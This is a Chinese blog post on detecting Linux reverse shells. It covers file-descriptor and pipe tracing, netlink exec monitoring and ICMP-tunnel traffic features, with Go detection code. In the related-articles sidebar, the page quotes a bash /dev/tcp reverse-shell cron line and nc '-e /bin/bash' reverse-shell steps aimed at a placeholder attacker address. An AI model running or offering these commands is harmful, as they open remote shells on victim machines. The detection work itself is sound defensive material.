入侵检测——如何实现反弹shell检测?

最新推荐文章于 2024-07-06 09:49:08 发布
最新推荐文章于 2024-07-06 09:49:08 发布
阅读量2.5k 收藏 3
点赞数 3
文章标签: linux 网络 运维 网络安全 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42009262/article/details/129760774
版权

反弹shell的本质:就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

反弹shell的结果:一个client上的bash进程 可以和 server上的进程通信。

而反弹shell的检测,本质上就是检测 shell进程(如bash)的输入输出是否来自于一个远程的server。

一、检测思路

1.进程 file descriptor 异常检测

1.1 检测 file descriptor 是否指向一个socket

以“重定向符”+"/dev/tcp网络通信"Bash反弹Shell这一类最经典的反弹Shell攻击方式为例,这类反弹shell的本质可以归纳为file descriptor的重定向到一个socket句柄

img

img

1.2 检测 file descriptor 是否指向一个管道符(pipe)

对于利用“管道符”传递指令的反弹shell攻击方式来说,这类反弹shell的本质可以归纳为file descriptor的重定向到一个pipe句柄

img

更进一步地说,不管做了多少层的pipe,反弹shell的本质是将server的输入传递给client的bash,因此肯定存在socket连接。

我们只需要根据pid追溯pipe上游的进程,并判断其进程fd,检查是否是来自一个socket。

例如,跟踪pipe,发现pipe的进程建立了socket连接,那么就存在反弹shell的风险。

2.netlink监控+fd异常检测

  • 监听Netlink Socket,实时获取进程EXEC事件。
  • 如果为Shell进程,检查进程启动打开的FD,
    • 打开了Socket
    • 未使用/dev/tty、/dev/pts/n、/dev/ptmx等终端
    • 则确认为反弹Shell

绕过风险:仅能通过进程执行文件名判断是否为Shell进程,上传可执行文件、拷贝Bash文件到其他路径等方法会绕过这个方法

例如通过将/bin/sh重命名为其他名字进行反弹shell。

3.脚本文件 && 应用程序 && 无文件(fileless)反弹shell检测

需要注意的是,操作系统是分层的,Bash只是一个应用程序的普通应用,其内部封装了调用glibc execve的功能而已,除了bash之外,白帽子还可以基于任意的应用层技术来实现反弹shell,例如:

  • python/perl实现纯代码形式的反弹shell文件执行:文件脚本检测
  • python/perl实现纯代码形式的反弹shell命令行指令(fileless):纯命令行fileless检测
  • C/C++实现纯代码形式的反弹shell:二进制文件检测

4. 特征检测

4.1网络层反弹shell通信特征检测

反弹shell的通信会话中,会包含一些”cmdline shell特征“,例如”#root…“等,可以在网络侧进行NTA实时检测。

4.2DNS反弹shell特征检测

针对DNS流量进行分析,判断关联进程是否开启/dev/net/tun,或者/dev/net/tap隧道等等。

4.3 ICMP反弹shell特征检测

对于正常的ping命令产生的数据,有以下特点:

● 每秒发送的数据包个数比较少,通常每秒最多只会发送两个数据包;

● 请求数据包与对应的响应数据包内容一样;

● 数据包中payload的大小固定,windows下为32bytes,linux下为48bytes;

● 数据包中payload的内容固定,windows下为abcdefghijklmnopqrstuvwabcdefghi,linux下为!”#$%&’()+,-./01234567,如果指定ping发送的长度,则为不断重复的固定字符串;

● type类型只有2种,0和8。0为请求数据,8为响应数据。

对于ICMP隧道产生的数据,有以下特点:

● 每秒发送的数据包个数比较多,在同一时间会产生成百上千个 ICMP 数据包;

● 请求数据包与对应的响应数据包内容不一样;

● 数据包中 payload的大小可以是任意大小;

● 存在一些type为13/15/17的带payload的畸形数据包;

● 个别ICMP隧道工具产生的数据包内容前面会增加 ‘TUNL’ 标记以用于识别隧道。

因此,根据正常ping和ICMP隧道产生的数据包的特点,可以通过以下几点特征检测ICMP隧道:

● 检测同一来源数据包的数量。正常ping每秒只会发送2个数据包,而ICMP隧道可以每秒发送很多个;

● 检测数据包中 payload 的大小。正常ping产生的数据包payload的大小为固定,而ICMP隧道数据包大小可以任意;

● 检测响应数据包中 payload 跟请求数据包是否不一致。正常ping产生的数据包请求响应内容一致,而ICMP隧道请求响应数据包可以一致,也可以不一致;

● 检测数据包中 payload 的内容。正常ping产生的payload为固定字符串,ICMP隧道的payload可以为任意;

● 检测 ICMP 数据包的type是否为0和8。正常ping产生的带payload的数据包,type只有0和8,ICMP隧道的type可以为13/15/17。

图片名称

具体实现可参考https://blog.riskivy.com/%E5%9F%BA%E4%BA%8E%E7%BB%9F%E8%AE%A1%E5%88%86%E6%9E%90%E7%9A%84icmp%E9%9A%A7%E9%81%93%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95%E4%B8%8E%E5%AE%9E%E7%8E%B0/

二、具体实现举例

1.监听Netlink Socket 并轮询处理

func (ns *NetlinkSocket) ReceiveFrom() ([]syscall.NetlinkMessage, syscall.Sockaddr, error) {
	nr, from, err := syscall.Recvfrom(ns.fd, ns.buf, 0)
	if err != nil {
		return nil, from, err
	}
	if nr < syscall.NLMSG_HDRLEN {
		return nil, from, fmt.Errorf("Got short response from netlink")
	}

	msg, err := syscall.ParseNetlinkMessage(ns.buf[:nr])
	return msg, from, err
}

2.实时处理进程EXEC事件

func (p *Probe) netLinkHandler(e *netlinkProcEvent) {
	switch e.Event {
	case netlink.PROC_EVENT_EXEC:
		p.handleProcExec(e.Pid, false) // pid
	}
}

3.根据反弹shell的基本原理,判断进程 file descriptor 是否异常

//根据反弹shell的基本原理,判断进程 file descriptor 是否异常(也就是是否相等)
func (p *Probe) checkReverseShell(pid int)  {
    //获取对应的inode
   inodeStdin, err := osutil.GetFDSocketInode(pid, 0)
   if err != nil {
      return nil
   }
   inodeStdout, err := osutil.GetFDSocketInode(pid, 1)
   if err != nil {
      return nil
   }
   if inodeStdin != inodeStdout || inodeStdin == 0 {
      return nil
   }
   return osutil.GetProcessConnection(pid, nil, utils.NewSet(inodeStdin))
}

//获取进程对应的连接
func GetProcessConnection(pid int, clientPort *share.CLUSProtoPort, inodes utils.Set) *Connection {
	var err error
	if inodes == nil {
		inodes, err = GetProcessSocketInodes(pid)
		if err != nil {
			return nil
		}
	}
	if inodes.Cardinality() == 0 {
		return nil
	}
	var sport uint16
	if clientPort != nil {
		sport = clientPort.Port
	}
	pidDir := global.SYS.ContainerProcFilePath(pid, "/")
	if clientPort == nil || clientPort.IPProto == syscall.IPPROTO_TCP {
		if conn := getConnectionByFile(pidDir+"net/tcp", inodes, true, sport); conn != nil {
			return conn
		}
		if conn := getConnectionByFile(pidDir+"net/tcp6", inodes, true, sport); conn != nil {
			return conn
		}
	}
	if clientPort == nil || clientPort.IPProto == syscall.IPPROTO_UDP {
		if conn := getConnectionByFile(pidDir+"net/udp", inodes, false, sport); conn != nil {
			return conn
		}
		if conn := getConnectionByFile(pidDir+"net/udp6", inodes, false, sport); conn != nil {
			return conn
		}
	}
	return nil
}

以上方式的缺点为:仅能通过进程执行文件名判断是否为Shell进程,上传可执行文件、拷贝Bash文件到其他路径等方法会绕过这个方法

除此以外,还可以对特定场景进行分析,进程对应的fd是否异常并且外联,开源代码可参考:https://github.com/zhanghaoyil/seesaw;

三、总结

这篇文章主要介绍了常见的反弹shell检测思路,以及实现举例,欢迎大家进行补充与分享!

四、参考链接

  1. 郑瀚Andrew反弹Shell原理及检测技术研究
每天一个秃顶小技巧
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
shell脚本实现实时检测文件变更
09-15
本文主要讲解如何使用Shell脚本来实现实时检测文件变更,并在文件发生变化时执行相应的操作,例如在Web开发中,当Python源代码或模板文件更新时自动重启uWSGI服务。这种方法可以避免手动频繁地重启服务,提高开发...
反弹shell原理与检测思路
weixin_45690589的博客
02-26 584
反弹shell的本质可以定义为:一个client上的bash进程 可以和 server上的进程通信。本质上就是检测 shell进程(如bash)的输入输出是否来自于一个远程的server。由于进程通信的复杂性(例如pipe),会导致单纯的检测shell进程的0 1 2 是否来自socket会存在漏报。但是按照这个思路,检测shell进程的0 1 2 的来源,顺着来源继续跟踪,如果最终是来自一个socket。那么则存在反弹shell风险
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 2957
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
Linux系统反弹shell总结
Bird&Bird
06-07 1300
目录前言正向连接反向连接利用netcat反弹shell利用Bash反弹shellCurl配合Bash反弹shell反弹shell的命令写入定时任务将反弹shell的命令写入/etc/profile文件利用Socat反弹shell利用Telnet反弹shell方法一方法二各种脚本反弹shellPython 脚本反弹shellphp 脚本反弹shellPerl 脚本反弹shellRuby脚本反弹shell使用Metasploit生成反弹shell用的一句话反弹shell后获取模拟终端使用OpenSSL反弹加密
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2384
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
常见工具 nc Wireshark反弹shell
代码审计
04-20 1143
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
带你了解LINUX反弹Shell的各种姿势(超详细)
xf555er的博客
11-27 1712
LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务端的角色反转本篇文章介绍LINUX反弹Shell的多种姿势, 在真实的渗透环境中, 根据客户端存在哪些命令的实际情况, 来采取相应的反弹shell姿势。
HIDS反弹shell检测方法
王教主的博客
02-24 990
检测方法 特征:shell(sh bash zsh)进程存在异常的stdin/stdout、异常参数、异常网络连接。 行为:检测大概率是在ssh登陆下才会使用的二进制文件(如ls/cat/ip/ipconfig/cd/chmod),1.如果发现这些进程的stdin/stdout和tty不一致则告警;2.如果发现这些进程的dip/dport/sip/sport和SSH_CONNECTION不一致则告警 反弹手段和检测方法 反弹方法 检测方法 bash -i >& /dev/t
Shell脚本实现检测进程是否正在运行
09-15
总结来说,这个简单的Shell脚本利用了Linux的`ps`命令和`grep`命令,有效地实现检测指定进程是否运行的功能。这对于日常的系统维护、自动化监控或者故障排查都是非常有用的。通过理解并运用这个脚本,我们可以更好...
shell脚本实现linux系统文件完整性检测
09-15
主要介绍了shell脚本实现linux系统文件完整性检测,本文给出的脚本使用对比MD5的方法,检测linux系统文件是否被替换等问题,需要的朋友可以参考下
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
Shell脚本实现检测Cygwin最快的镜像站点
09-15
这篇文章主要讲解如何使用Shell脚本来检测Cygwin的最快镜像站点,这个脚本的原理同样适用于其他开源软件如apache和nginx。通过自动化的方式,你可以更有效地找到最适合自己下载的镜像源,从而提高下载速度。 首先,...
linux服务器告警反弹shell行为
lanren312的博客
05-20 447
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1。客户今天持续收到服务器告警,给出了可以参数信息。告警说明:Linux反弹shell行为。再去看cron日志,果然一分钟一次。果断将里面的内容清空,到此告警消失。
linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell
weixin_39820136的博客
05-14 1128
用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6019
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Linux下几种反弹Shell方法的总结与理解
weixin_50464560的博客
03-31 1700
Linux下几种反弹Shell方法的总结与理解 - FreeBuf网络安全行业门户 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境 CentOS 6.5:192.168.0.3 kali2.0:
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1139
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
linux/shelllinux如何去除字符串中空格
最新发布
qq_35902025的博客
07-06 408
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
如何利用nc实现反弹shell
07-29
要利用nc实现反弹shell,可以按照以下步骤进行操作: 1. 在攻击者机器上启动nc监听器: ``` nc -l -p <port> ``` 这将在指定端口上启动nc监听器,等待受控目标连接。 2. 在目标机器上执行以下命令以建立与攻击者机器的连接,并将shell重定向到该连接: ``` nc <attacker_ip> <attacker_port> -e /bin/bash ``` 替换`<attacker_ip>`为攻击者的IP地址,`<attacker_port>`为攻击者nc监听器的端口号。 3. 成功执行以上命令后,目标机器上的shell将与攻击者机器上的nc监听器建立连接,并将shell会话返回给攻击者。 请注意,反弹shell是一种潜在的攻击技术,仅限于合法的安全测试和授权的渗透测试。任何未经授权的使用都是非法的,并可能导致法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

每天一个秃顶小技巧

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值